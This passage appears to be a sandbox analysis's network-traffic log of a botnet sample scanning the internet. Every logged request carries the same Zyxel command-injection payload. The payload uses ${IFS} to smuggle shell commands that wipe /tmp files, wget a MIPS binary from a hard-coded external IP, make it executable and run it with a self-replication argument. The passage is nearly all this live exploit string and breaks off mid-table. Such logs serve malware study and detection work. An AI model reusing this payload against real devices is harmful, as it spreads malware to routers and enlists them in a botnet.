                                                  Jan 19, 2024 18:24:00.148684978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5512192.168.2.1333786203.199.151.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148737907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5513192.168.2.1355378166.109.33.62443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148775101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5514192.168.2.1360960219.37.203.76443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148812056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5515192.168.2.1335314211.113.48.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148854017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5516192.168.2.13509022.180.34.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148895025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5517192.168.2.134797298.108.72.110443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148945093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5518192.168.2.1336558141.80.88.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.148982048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5519192.168.2.1333176193.135.136.84443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149018049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5520192.168.2.1354612161.182.207.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149053097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5521192.168.2.1353724188.132.203.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149085999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5522192.168.2.1352674136.151.31.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149131060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5523192.168.2.135095886.222.174.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149154902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5524192.168.2.135373053.26.211.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149216890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5525192.168.2.1340310204.216.160.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149256945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5526192.168.2.1357182185.25.132.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149276972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5527192.168.2.1350830159.145.66.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149307013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5528192.168.2.134953696.167.249.52443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149353981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5529192.168.2.133672850.107.100.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149389982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5530192.168.2.1351278206.115.93.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149434090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5531192.168.2.1347914181.133.83.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149451017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5532192.168.2.13554948.215.193.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149488926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5533192.168.2.1337896218.108.162.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149558067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5534192.168.2.1357840201.133.123.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149595022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5535192.168.2.1358994112.64.138.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149617910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5536192.168.2.1352826198.232.135.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149633884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5537192.168.2.1342264210.147.7.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149671078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5538192.168.2.1346224177.51.20.192443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149701118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5539192.168.2.1346534146.196.145.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149741888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5540192.168.2.135650089.197.128.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149771929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5541192.168.2.133588042.111.249.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149818897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5542192.168.2.1349378134.224.104.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149863005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5543192.168.2.1340384134.167.9.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149893045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5544192.168.2.133585434.111.174.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149945974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5545192.168.2.136052251.222.223.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.149976015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5546192.168.2.134923691.156.73.92443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150027990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5547192.168.2.133812020.41.226.6443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150060892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5548192.168.2.133804435.245.27.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150085926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5549192.168.2.134452298.147.209.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150141954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5550192.168.2.1336886116.79.146.229443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150192976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5551192.168.2.133431672.55.203.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150232077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5552192.168.2.133724053.206.158.197443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150254965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5553192.168.2.1355646175.208.193.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150310040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5554192.168.2.135354219.101.109.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150333881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5555192.168.2.1336154113.224.93.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150346994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5556192.168.2.133615085.175.205.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150391102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5557192.168.2.1352512191.24.25.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150418997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5558192.168.2.133670875.108.204.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150448084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5559192.168.2.135580253.8.29.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150490046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5560192.168.2.134591476.40.196.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150530100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5561192.168.2.1334412199.178.202.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150604010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5562192.168.2.1351378143.140.92.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150624037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5563192.168.2.134755649.38.160.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150671959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5564192.168.2.1348916170.102.165.28443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150702000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5565192.168.2.1352292137.175.115.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150752068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5566192.168.2.135552498.38.247.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150773048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5567192.168.2.1350746195.121.128.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150827885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5568192.168.2.135573296.152.193.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150868893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5569192.168.2.1356888146.202.58.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150923014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5570192.168.2.135279251.208.159.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150949955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5571192.168.2.135835090.171.194.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.150968075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5572192.168.2.1341328144.129.44.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151016951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5573192.168.2.1348706159.126.39.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:00.151041031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5574192.168.2.135072296.45.188.217443
                                                  TimestampBytes transferredDirectionData
